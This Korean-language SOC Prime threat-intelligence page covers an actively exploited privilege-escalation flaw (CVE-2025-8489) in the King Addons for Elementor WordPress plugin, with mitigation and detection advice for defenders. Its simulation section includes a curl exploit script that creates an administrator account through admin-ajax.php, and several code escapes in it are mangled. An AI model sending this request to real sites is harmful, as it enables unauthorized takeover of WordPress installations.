SOC Prime Bias: 심각

08 12월 2025 20:57
newspaper icon Wordfence

Elementor의 중요한 King Addons 취약점, 공격받고 있음

Author Photo
Ruslan Mikhalov Chief of Threat Research at SOC Prime linkedin icon Follow
Elementor의 중요한 King Addons 취약점, 공격받고 있음
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query


요약

King Addons for Elementor 워드프레스 플러그인의 중대한 인증되지 않은 권한 상승 결함(CVE-2025-8489)이 공격자에게 관리자 권한으로 새 사용자를 등록할 수 있게 합니다. 이 버그는 2025년 10월 31일부터 적극적으로 악용되고 있으며, Wordfence가 수만 건의 시도를 차단했습니다. 공격자는 crafted POST 요청을 admin-ajax.php 엔드포인트로 전송하여 문제를 악용합니다. 24.12.92부터 51.1.14까지의 버전이 영향을 받으며, 51.1.35 버전에서 수정되었습니다.

조사

Wordfence 텔레메트리는 2025년 11월 9일부터 10일까지 주목할 만한 급증과 함께 48,400건 이상의 악용 시도를 기록했습니다. 가장 활동적인 IPv6 소스 주소는 2602:fa59:3:424::1이었습니다. 악성 페이로드는 등록 워크플로 중 user_role 매개변수를 관리자에 설정하는 HTTP POST 데이터를 사용합니다. 악성 관리자 계정 생성을 제외하고 추가 악성코드 배포는 관찰되지 않았습니다.

완화

King Addons for Elementor를 버전 51.1.35 이상으로 업그레이드하세요. 2025년 8월 4일(프리미엄)과 2025년 9월 3일(무료)에 배포된 Wordfence 방화벽 보호 기능을 활성화하세요. 예상치 못한 관리자 계정을 위한 워드프레스 사용자 목록을 감사하고, 의심스러운 POST 패턴에 대한 로그를 지속적으로 검토하세요.

대응

user_role=administrator를 포함하는 /wp-admin/admin-ajax.php로의 POST 트래픽에 대한 경고를 트리거합니다. 강조된 IPv6 소스에 특별히 주의하여 악의적인 IP 주소를 차단합니다. 계정 위생 점검을 수행하고 허가되지 않은 관리자 사용자를 제거하십시오. 관찰된 요청 구조에 맞춰 조정된 호스트 기반 IDS 서명을 배포합니다.

graph TB %% 클래스 정의 섹션 classDef technique fill:#ffcc00 %% 노드 정의 tech_exploit_public_facing[“<b>기법</b> – <b>T1190 공개 애플리케이션 취약점 악용</b><br />공격자는 공개 애플리케이션을 악용하여 초기 접근 권한을 획득합니다.”] class tech_exploit_public_facing technique tech_exploitation_priv_esc[“<b>기법</b> – <b>T1068 권한 상승을 위한 취약점 악용</b><br />공격자는 소프트웨어 취약점을 악용하여 시스템에서 자신의 권한을 상승시킵니다.”] class tech_exploitation_priv_esc technique tech_account_manipulation[“<b>기법</b> – <b>T1098 계정 조작</b><br />공격자는 목표를 달성하기 위해 계정을 생성, 수정 또는 삭제합니다.”] class tech_account_manipulation technique tech_valid_accounts[“<b>기법</b> – <b>T1078 유효 계정</b><br />공격자는 합법적인 자격 증명을 확보하고 계정에 접근하는 데 사용합니다.”] class tech_valid_accounts technique %% 공격 흐름을 나타내는 연결 tech_exploit_public_facing u002du002d>|이후 단계| tech_exploitation_priv_esc tech_exploitation_priv_esc u002du002d>|이후 단계| tech_account_manipulation tech_account_manipulation u002du002d>|이후 단계| tech_valid_accounts

공격 흐름

시뮬레이션 실행

전제조건: 텔레메트리 및 기준선 사전 비행 점검이 통과해야 합니다.

  • 공격 내러티브 및 명령어:
    적은 King Addons for Elementor 플러그인에서 CVE‑2025‑8489를 발견합니다. 그들은 POST 요청을 작성하여 admin-ajax.php 에 action=king_addons_user_register 매개변수를 포함시킵니다(플러그인에서 요구). and 새 사용자의 역할을 관리자 로 강제합니다 user_role=administrator. 이 요청을 취약한 엔드포인트로 직접 전송함으로써, 공격자는 사전 인증 없이 권한 있는 워드프레스 계정을 얻습니다. 페이로드는 실제 웹 클라이언트를 복제하기 위해 URL 인코딩됩니다.

  • 회귀 테스트 스크립트:

    #!/usr/bin/env bash
# King Addons for Elementor 권한 상승 악용 스크립트 (CVE‑2025‑8489)

TARGET="http://webserver.example.com"
ENDPOINT="/wp-admin/admin-ajax.php"

# Crafted POST data (URL 인코딩)
POST_DATA="action=king_addons_user_register&user_login=eviladmin&user_email=evil@example.com&user_pass=P@ssw0rd!&user_role=administrator"

echo "[*] 악용 페이로드 전송 중..."
curl -s -o /dev/null -w "%{http_code}" -X POST "${TARGET}${ENDPOINT}" 
     -H "Content-Type: application/x-www-form-urlencoded" 
     --data "${POST_DATA}"

echo -e "n[+] 악용 전송 완료. 생성된 알림을 위해 SIEM을 확인하세요."

  • 정리 명령어:

    # 테스트 중 생성된 악성 사용자 제거
curl -X POST "http://webserver.example.com/wp-admin/admin-ajax.php" 
  -d "action=delete_user&user_id=$(curl -s "http://webserver.example.com/wp-json/wp/v2/users?search=eviladmin" | jq -r '.[0].id')"
echo "[*] 정리 완료."

SOC Prime의 Detection as Code 플랫폼에 가입하세요 귀하의 비즈니스와 가장 관련 있는 위협에 대한 가시성을 향상시키세요. 시작하고 즉각적인 가치를 창출하기 위해 지금 SOC Prime 전문가와의 미팅을 예약하세요.

무료 가입하기